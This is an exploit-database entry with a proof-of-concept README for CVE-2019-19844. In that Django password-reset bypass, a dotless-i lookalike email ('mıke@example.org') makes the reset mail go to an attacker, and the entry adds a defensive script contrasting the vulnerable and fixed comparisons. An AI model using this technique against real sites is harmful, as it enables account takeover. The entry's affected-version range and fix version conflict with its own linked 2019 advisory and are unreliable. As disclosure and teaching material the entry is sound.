Vendor: Django
By: Exploit Database
CVSS: 9.8 (CRITICAL)
CWE: 287 (Authentication Bypass)
Product Name: Django
Affected Version From: Django version 3.0.0
Affected Version To: Django version 3.0.6
Patch Exists: YES
Related CWE: CVE-2019-19844
CPE: a:djangoproject:django:3.0.0
Other Scripts: N/A
Platforms Tested: None
Year: 2019

django_cve_2019_19844_poc

This PoC exploits a vulnerability in Django's password reset form which allows an attacker to bypass authentication by submitting a specially crafted email address that is treated as matching a victim's address under the form's case-insensitive lookup. The reset email is then delivered to the attacker's address, so the attacker can reset the password of any user in the system and gain access to their account.

Mitigation:

Upgrade to Django version 3.0.7 or later.
Source

Exploit-DB raw data:

EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip


# django_cve_2019_19844_poc
PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)

# Requirements

- Python 3.7.x
- PostgreSQL 9.5 or higher

## Setup

1. Create a database (e.g. `django_cve_2019_19844_poc`)
1. Set the database name in the environment variable `DJANGO_DATABASE_NAME` (e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
1. Create the following user with the `shell` command:

```python
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> # arguments: username, email, password
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
```

## Procedure For Reproducing

1. Run `./manage.py runserver`
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
1. Enter `mıke@example.org` (the attacker's email) and click the send button
1. Receive the email (check the console) and reset the password
1. Log in as the `mike123` user
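The comparison the procedure above abuses, shown beside the stricter check Django added to `PasswordResetForm.get_users()` when fixing CVE-2019-19844, as an added example that is not part of the PoC or of Django's own code. The user table is constructed, and `db_iexact_match` only emulates a database-side case-insensitive lookup by uppercasing both operands (the form Django's `iexact` takes on PostgreSQL); the real behaviour depends on the database and its collation.

```python
import unicodedata
from typing import List

# Constructed sample user table (username, email), standing in for auth_user.
USERS = [
    ("mike123", "mike@example.org"),
    ("alice", "alice@example.org"),
]


def db_iexact_match(stored: str, requested: str) -> bool:
    """Emulate a case-insensitive DB lookup that uppercases both sides
    (UPPER(col) = UPPER(value)). Unicode case mapping sends dotless 'ı'
    (U+0131) to 'I', so 'mıke@...' and 'mike@...' compare equal here."""
    return stored.upper() == requested.upper()


def unicode_ci_compare(s1: str, s2: str) -> bool:
    """Case-insensitive identifier comparison per Unicode TR36 2.11.2(B)(2):
    NFKC-normalise, then casefold. 'ı' casefolds to itself, not to 'i',
    so the dotless-i lookalike no longer matches."""
    return (unicodedata.normalize("NFKC", s1).casefold()
            == unicodedata.normalize("NFKC", s2).casefold())


def vulnerable_get_users(requested_email: str) -> List[str]:
    """Pre-fix behaviour: every account the DB lookup returns receives the
    reset token, even when the typed address differs from the stored one."""
    return [name for name, addr in USERS if db_iexact_match(addr, requested_email)]


def fixed_get_users(requested_email: str) -> List[str]:
    """Post-fix behaviour: DB lookup plus a second comparison in Python, so
    the reset mail only goes to an address that really matches."""
    return [name for name, addr in USERS
            if db_iexact_match(addr, requested_email)
            and unicode_ci_compare(addr, requested_email)]


if __name__ == "__main__":
    lookalike = "m\u0131ke@example.org"   # the PoC's address: dotless i, U+0131
    print("vulnerable:", vulnerable_get_users(lookalike))  # ['mike123']
    print("fixed:     ", fixed_get_users(lookalike))       # []
    print("legit:     ", fixed_get_users("MIKE@Example.org"))  # ['mike123']
```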